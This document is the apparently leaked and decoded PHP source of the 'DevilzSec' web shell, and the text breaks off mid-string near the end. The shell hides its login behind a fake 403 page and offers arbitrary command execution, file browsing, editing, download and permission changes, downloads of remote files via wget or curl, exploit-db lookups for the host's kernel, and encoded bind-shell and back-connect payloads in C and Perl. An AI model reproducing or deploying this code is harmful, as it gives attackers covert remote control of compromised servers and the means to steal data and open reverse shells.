DevilzSec Shell leaked & decoded

<?php
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('display_errors',0);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
$xName='DevilzSec';
$auth_pass= 'dcb76da384ae3028d6aa9b2ebcea01c9';
$xSoftware = trim(getenv('SERVER_SOFTWARE'));
$xServerName = $_SERVER['HTTP_HOST'];
$release = @php_uname('r');
$kernel  = @php_uname('s');
$explink = 'http://exploit-db.com/search/?action=search&filter_description=';
if(strpos('Linux',$kernel) !== false)
$explink .= urlencode('Linux Kernel '.substr($release,0,6));
else
$explink .= urlencode($kernel .' '.substr($release,0,3));
$release1 = @php_uname('r');
$kernel1  = @php_uname('s');
$explink1 = 'http://www.google.com/search?q=';
if(strpos('Linux',$kernel) !== false)
$explink1 .= urlencode('Linux Kernel '.substr($release1,0,6));
else
$explink1 .= urlencode($kernel1 .' '.substr($release1,0,3));
function printLogin() {
echo "<title>403 Forbidden</title>
          <h1>Forbidden</h1>
		  <p>You don't have permission to access this file on this server.</p>
          <hr>
          <address>Apache Server at ".$_SERVER['HTTP_HOST'].' Port 80</address>
          <style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
          <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><form method=post><input type=password name=pass></form>';
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
elseif(isset($_GET['dl']) &&($_GET['dl'] != ''))
{
$file 	= $_GET['dl'];
$filez 	= @file_get_contents($file);
header('Content-type: application/octet-stream');
header('Content-length: '.strlen($filez));
header("Content-disposition: attachment;
	filename=\"".basename($file)."\";");
echo $filez;
exit;
}
elseif(isset($_GET['dlgzip']) &&($_GET['dlgzip'] != ''))
{
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header('Content-length: '.strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
echo $filez;exit;
}
if(isset($_GET['img']))
{
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d.$f);
$ext = explode($f,'.');
$ext = $ext[count($ext)-1];
@header('Content-type: '.$inf['mime']);
@header('Cache-control: public');
@header('Expires: '.date('r',mktime(0,0,0,1,1,2030)));
@header('Cache-control: max-age='.(60*60*24*7));
@readfile($d.$f);
exit;
}
$software = getenv('SERVER_SOFTWARE');
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') $safemode = TRUE;
else $safemode 	= FALSE;
$system 	= @php_uname();
if(strtolower(substr($system,0,3)) == 'win') $win = TRUE;
else $win 	= FALSE;
if(isset($_GET['y']))
{if(@is_dir($_GET['view'])){$pwd = $_GET['view'];@chdir($pwd);}else{$pwd = $_GET['y'];@chdir($pwd);}}
if(!$win)
{if(!$user = rapih(exe('whoami'))) $user = '';if(!$id = rapih(exe('id'))) $id = '';$prompt = $user." \$ ";$pwd = @getcwd().DIRECTORY_SEPARATOR;}
else
{
$user 	= @get_current_user();
$id 	= $user;
$prompt = $user.' &gt;';
$pwd 	= realpath('.')."\\";
$v 	= explode("\\",$d);
$v 	= $v[0];
foreach (range('A','Z') as $letter)
{
$bool = @is_dir($letter.":\\");
if ($bool)
{
$letters 	.= "<a href=\"?y=".$letter.":\\\">[ ";
if ($letter.':'!= $v) {$letters .= $letter;}
else {$letters 	.= "<span class=\"gaya\">".$letter.'</span>';}
$letters 	.= ' ]</a> ';
}
}
}
$disablefunc = @ini_get('disable_functions');
function showdisablefunctions() {
if ($disablefunc=@ini_get('disable_functions')){return "<span class='on'>".$disablefunc.'</span>';}
else {return "<span class='off'>NONE</span>";}
}
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
}elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
}elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}elseif(@is_resource($f = @popen($cfe,'r'))) {
$res = '';
while(!@feof($f)) {$res .= @fread($f,1024);}
@pclose($f);
}else {$res = 'Ex() Disabled!';}
}
return $res;
}
function openBaseDir()
{
$openBaseDir = ini_get('open_basedir');
if (!$openBaseDir){$openBaseDir = '<span class="off">OFF</span>';}
else {$openBaseDir = '<span class="on">ON</span>';}
return $openBaseDir;
}
function testperl() {
if (ex('perl -h')) {$perl='<span class="on">ON</span>';}
else {$perl= '<span class="off">OFF</span>';}return $perl;
}
function testfetch() {
if (ex('fetch --help')) {$fetch='<span class="on">ON</span>';}
else {$fetch= '<span class="off">OFF</span>';}return $fetch;
}
function testwget() {
if (ex('wget --help')) {$wget= '<span class="on">ON</span>';}
else {$wget= '<span class="off">OFF</span>';}return $wget;
}
function testoracle() {
if(function_exists('ocilogon')){$oracle = '<span class="on">ON</span>';}
else {$oracle = '<span class="off">OFF</span>';}return $oracle;
}
function testpostgresql() {
if (function_exists('pg_connect')){$postgreSQL = '<span class="on">ON</span>';}
else {$postgreSQL = '<span class="off">OFF</span>';}return $postgreSQL;
}
function testmssql() {
if (function_exists('mssql_connect')){$msSQL = '<span class="on">ON</span>';}
else {$msSQL = '<span class="off">OFF</span>';}return $msSQL;
}
function testcurl() {
if (extension_loaded('curl')){$curl = '<span class="on">ON</span>';}
else{$curl = '<span class="off">OFF</span>';}return $curl;
}
function testmysql() {
$mysql_try = function_exists('mysql_connect');
if ($mysql_try){$mysql = '<span class="on">ON</span>';}
else {$mysql = '<font color="green">OFF</font>';}return $mysql;
}
$quotes = get_magic_quotes_gpc();
if ($quotes == '1'or $quotes == 'on')
{
$quot = '<span class="on">ON</span>';
}
else
{
$quot = '<span class="off">OFF</span>';
}
if(function_exists('posix_getpwuid') &&function_exists('posix_getgrgid')) $posix = TRUE;
else $posix = FALSE;
$bytes = disk_free_space('.');
$si_prefix = array( 'B','KB','MB','GB','TB','EB','ZB','YB');
$base = 1024;
$class = min((int)log($bytes ,$base) ,count($si_prefix) -1);
$totalspace_bytes = disk_total_space('.');
$totalspace_si_prefixs = array( 'B','KB','MB','GB','TB','EB','ZB','YB');
$totalspace_bases = 1024;
$totalspace_class = min((int)log($totalspace_bytes ,$totalspace_bases) ,count($totalspace_si_prefixs) -1);
$totalspace_show = sprintf('%1.2f',$totalspace_bytes / pow($totalspace_bases,$totalspace_class)) .' '.$totalspace_si_prefixs[$totalspace_class] .'';
$freespace_show = sprintf('%1.2f',$bytes / pow($base,$class)) .' '.$si_prefix[$class] .'';
$server_ip 	= @gethostbyname($_SERVER['HTTP_HOST']);
$my_ip 		= $_SERVER['REMOTE_ADDR'];
$bindport 	= '443';
$bindport_pass 	= 'CyberSEC';
$pwds 		= explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl 	= '';
for($i = 0 ;$i <sizeof($pwds)-1 ;$i++)
{
$pathz 	= '';
for($j 	= 0 ;$j <= $i ;$j++)
{
$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
}
$pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i].' '.DIRECTORY_SEPARATOR.' </a>';
}
if(isset($_POST['rename'])){
$old = $_POST['oldname'];
$new = $_POST['newname'];
@rename($pwd.$old,$pwd.$new);
$file = $pwd.$new;
}
if(isset($_POST['chmod'])){
$name = $_POST['name'];
$value = $_POST['newvalue'];
if (strlen($value)==3){
$value = 0 .''.$value;
}
@chmod($pwd.$name,octdec($value));
$file = $pwd.$name;
}
if(isset($_POST['chmod_folder'])){
$name = $_POST['name'];
$value = $_POST['newvalue'];
if (strlen($value)==3){
$value = 0 .''.$value;
}
@chmod($pwd.$name,octdec($value));
$file = $pwd.$name;
}
$buff  =$software.'<br />';
$buff .=$system.' <a href='.$explink .' target=_blank>[Exploit-db.com]</a><a href='.$explink1 .' target=_blank>[Google]</a><br />';
if($id != '')
$buff .= $id.'<br />';
$buff .='Php : '.@phpversion()." <span class=\"gaya\">|</span> <a href=\"?y=".$pwd."&amp;x=phpinfo\">[ phpinfo ]</a><br/>";
$buff .= 'Server Ip : <span class=off>'.$server_ip."</span> <span class=\"gaya\">|</span> Your Ip : <span class=off>".$my_ip."</span></span><span class=\"gaya\">|</span> <a href=http://zone-h.org/archive/ip=".$server_ip.'>[ Bing ]</a></span> <a href=http://zone-h.org/archive/ip='.$server_ip.'>[ Zone-H ]</a><br />';
$buff .= 'Total HDD Space : '."<span class=off>$totalspace_show</span>"." <font><span class=\"gaya\">|</span></font> ".'Free HDD Space : '."<span class=off>$freespace_show</span>".'<br />';
$buff .= "Magic Quotes: $quot".'<br>';
$buff .= 'Disabled Functions : '.showdisablefunctions().'<br>';
$buff .= 'MySQL: '.testmysql().' MSSQL: '.testmssql().' Oracle: '.testoracle().' MSSQL: '.testmssql().' PostgreSQL: '.testpostgresql().' cURL: '.testcurl().' WGet: '.testwget().' Fetch: '.testfetch().' Perl: '.testperl().' Open Basedir: '.openBaseDir().'<br>';
if($safemode) $buff .= 'safemode <span class="on">ON</span>';
else $buff .= 'Safemode : <span class="off">ON</span><br>';
$buff .= $letters.'&nbsp;&gt;&nbsp;'.$pwdurl;
function rapih($text){return trim(str_replace('<br />','',$text));}
function magicboom($text){if (!get_magic_quotes_gpc()) {return $text;}return stripslashes($text);}
function showdir($pwd,$prompt)
{
$fname = array();
$dname = array();
if(function_exists('posix_getpwuid') &&function_exists('posix_getgrgid')) $posix = TRUE;
else $posix = FALSE;
$user = '????:????';
if($dh = opendir($pwd))
{
while($file = readdir($dh))
{
if(is_dir($file))
{$dname[] = $file;}
elseif(is_file($file))
{$fname[] = $file;}
}
closedir($dh);
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = '';
$buff ="<br>
		        <table class=\"explore\">
				<tr>
				<th>name</th>
				<th style=\"width:60px;\">Size</th>
				<th style=\"width:200px;\">Owner:Group</th>
				<th style=\"width:80px;\">Permission</th>
				<th style=\"width:110px;\">Modified</th>
				<th style=\"width:190px;\">Actions</th>
				</tr> ";
if($tree >2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder)
{
if($folder == '.')
{
if(!$win &&$posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {$owner = $user;}
$buff .= "<tr>
						<td><a href=\"?y=".$pwd."\">$folder</a></td>
						<td>-</td>
						<td style=\"text-align:center;\">".$owner.'</td>
						<td><center>'.get_perms($pwd)."</center></td>
						<td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($pwd))."</td>
						<td><span id=\"titik1\">
							<a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
							| <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
						    </span>
						<form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
							<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
							<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
						</form>
						</td>
					</tr> ";
}
elseif($folder == '..')
{
if(!$win &&$posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else 	{$owner = $user;}
$buff .= "<tr>
						<td>
						<a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAgZJREFUOE9jYKAF4I7ez6CVfVQvpOOiGcnm8yUdYVRvuWalvvjNTemqi01cUfuJN4Mv/QSjRsdNG81VH6/Lb/vzT6juWhtP/CFGokwQyD3DqNpxy1Zj5YdrCjv+/Zfb+uefSNPNNt6044QNECy5wKjUesNadcHr63Jrv/2XAWL5NV//W819sk9/6sMcMJ4GwXpTHiboTLpvpzXhnoxx/x0WBsHKywzyjdfNlKY9uSU1781/SSQsMef1f4nZr1DxrJcvJWe+XC45/XmIQv8DfgbBqqvScl1374r1Pfwv2gvDD4BsGIaIgeTF+h/9F5vw+I3YxMfrxCY+iQLyBRlEaq+JSjTdWCfRfPOPUMON/zAsDGSLNt38L4aGRZtvvhFrvrVOtOV2FBALMgjVXGMUb7qpIdNxZ51U193fIu13/4OwKBDrdj74bDbzwRNkbDrj/mXj6fdnGk6976/Xd58fHEPA0GaS7LirLdf3YI10/8NfolDviLU8WAQ01E66664tHHffNZftuasq33NPWLXjPgs8ikU77jFL9T3UkZ38ZI3U1Ge/xKc8+wf0Z5tI5z1GoIvQMQNQjEG07S5qEhHve8QsNfmpjvSM52ukZ736JT7pRRvQIMLpANkYoAZm6ZkvtDVmvVktWPK6SmL6K9IMABkmM/slk+qMN7Iy/W/kxKe/ISolk60IAJfcKhfb3kZPAAAAAElFTkSuQmCC' />  $folder</a></td>
						<td>-</td>
						<td style=\"text-align:center;\">".$owner.'</td>
						<td><center>'.get_perms($parent)."</center></td>
						<td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($parent))."</td>
						<td><span id=\"titik2\">
							<a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
							| <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
						    </span>
						<form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
							<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
							<input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
						</form>
						</td>
					</tr>";
}
else
{
if(!$win &&$posix)
{
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {$owner = $user;}
$buff .= "<tr>
						<td>
						<a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=' />  [ $folder ]</a>
						<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
							<input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
							<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
							onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
						</form>
						</td>
						<td>DIR</td>
						<td style=\"text-align:center;\">".$owner."</td>
						<td><center>
						<a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
							<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
							<input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
							<input class=\"inputz\" style=\"width:50px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($pwd.$folder)),-4)."\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
							<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
							onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
					</form>
					</center></td>
						<td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($folder))."</td>
						<td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
						| <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
						</td>
						</tr>";
}
}
foreach($fname as $file)
{
$full = $pwd.$file;
if(!$win &&$posix)
{
$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {$owner = $user;}
$buff .= "<tr>
					<td>
					<a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC' />  $file</a>
					<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
						<input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
						<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
							onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
					</form>
					</td>
					<td>".ukuran($full)."</td>
					<td style=\"text-align:center;\">".$owner."</td>
					<td><center>
					<a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
					<form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
						<input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
						<input class=\"inputz\" style=\"width:50px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o',fileperms($full)),-4)."\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
							onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" />
					</form></center></td>
					<td style=\"text-align:center;\">".date('d-M-Y H:i',@filemtime($full))."</td>
					<td>
					<a href=\"?y=$pwd&amp;edit=$full\">edit</a>
					| <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
					| <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
					| <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
					</td>
				</tr>";
}
$buff .= '</table>';return $buff;
}
function ukuran($file)
{
if($size = @filesize($file))
{
if($size <= 1024) return $size;
else
{
if($size <= 1024*1024)
{$size = @round($size / 1024,2);;return "$size kb";}
else {$size = @round($size / 1024 / 1024,2);return "$size mb";}
}
}
else return '???';
}
function exe($cmd)
{
if(function_exists('system'))
{
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}
elseif(function_exists('exec'))
{
@exec($cmd,$results);
$buff = '';
foreach($results as $result)
{$buff .= $result;}
return $buff;
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
}
elseif(function_exists('shell_exec'))
{
$buff = @shell_exec($cmd);
return $buff;
}
}
function tulis($file,$text)
{
$textz = gzinflate(base64_decode($text));
if($filez = @fopen($file,'w'))
{
@fputs($filez,$textz);
@fclose($file);
}
}
function tulis_2($file,$text)
{
$textz = base64_decode($text);
if($filez = @fopen($file,'w'))
{
@fputs($filez,$textz);
@fclose($file);
}
}
function ambil($link,$file)
{
if($fp = @fopen($link,'r'))
{
while(!feof($fp))
{
$cont.= @fread($fp,1024);
}
@fclose($fp);
$fp2 = @fopen($file,'w');
@fwrite($fp2,$cont);
@fclose($fp2);
}
}
function which($pr)
{
$path = exe("which $pr");
if(!empty($path))
{return trim($path);}
else {return trim($pr);}
}
function download($cmd,$url)
{
$namafile = basename($url);
switch($cmd)
{
case 'wwget': exe(which('wget').' '.$url.' -O '.$namafile);break;
case 'wlynx': exe(which('lynx').' -source '.$url.' > '.$namafile);break;
case 'wfread': ambil($wurl,$namafile);break;
case 'wfetch': exe(which('fetch').' -o '.$namafile.' -p '.$url);break;
case 'wlinks': exe(which('links').' -source '.$url.' > '.$namafile);break;
case 'wget': exe(which('GET').' '.$url.' > '.$namafile);break;
case 'wcurl': exe(which('curl').' '.$url.' -o '.$namafile);break;
default: break;}
return $namafile;
}
function get_perms($file)
{
if($mode=@fileperms($file))
{
$perms='';
$perms .= ($mode &00400) ?'r': '-';
$perms .= ($mode &00200) ?'w': '-';
$perms .= ($mode &00100) ?'x': '-';
$perms .= ($mode &00040) ?'r': '-';
$perms .= ($mode &00020) ?'w': '-';
$perms .= ($mode &00010) ?'x': '-';
$perms .= ($mode &00004) ?'r': '-';
$perms .= ($mode &00002) ?'w': '-';
$perms .= ($mode &00001) ?'x': '-';
return $perms;
}
else return '??????????';
}
function clearspace($text){return str_replace(' ','_',$text);}
$port_bind_bd_c='bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf';
$port_bind_bd_pl='ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=';
$back_connect='fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==';
$back_connect_c='XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==';
$style='tVbNctowEL53pu+gGSaXDjA2mDSxT2kKT9DptSMjGauxJY8tBwiTd+/qx7JMDORSgfnRane1n77dVSrI8YRSvH3Z1aLlJJ4EeiToHWF0QpIe5IzQraixZILHXHCqZF+/4DgXr7QGZVETWs9SIaUo47A6oEYUjKBJ9PywfNqo1d9OKBNczhr2RuMQliTmf4ZLVhzjXzgXJZ7+pjXBHE+faoaLBG1FIep4stHD+JyUlLfD7YZ6JKjE9Y7x+AHchwF8RPAslCOnh/AJVZgQxnexlgZKbPUgYN/qQo/kQvgFlRIibiq8VcZ0PDllu1zGaEXLZM+IzGMULuD3rBRvMwtRjQlrGxDQEkXw2O/khtgPwYHuQ/CoXgMIFj4CNw/ILpCiGpH+78DmEqecylO3/XAFW8CtFCjQX932QL3f21IPa6DEjANVzeYeV3cJTI4x2jpYBp2DUDOg44Smjf5Y2R8OGRvASk2NxO3PH2ZNjonYx8qQswh7SKMsg1V7mr4wObZw5a3Tce3wUaWgyQM/nTrZRSnjVSvfxhPFohn0gV8nSZcK4yTppJ7btJXjnm1CdzvtMk8R1W3L558eoNbWDehVgnHIusTzZJJhinrHn65JVylvohGtBKvIEXNAxhElw78wCO5cNYgCw6IRMnbgB32Vmm9LArw4DSy9o3lOMfnDeCb6+oUsaiBNQ7+4LgeUDj6ArguaJR4YgdccktkFobeRLj5hsaYkuWBMidC7MvRHpoXtIbhgOx5vqT7DwdkrPR8PN9UlmYbyUvJXeaWgQVBFCjqErjcZGINDBXKVpVs9eiP34B8qa3JuJZ/CM16PL5KwC0CDvDdU4aIuVdcbWM8XQO7+j+pgI2B6rfX+7Kz8kmdBGNbGLn/9xqiRmtNDBUDQD2y08zduB26ZhvlWNvYnpSBGBeN0ZlNoEbn0cCbzPh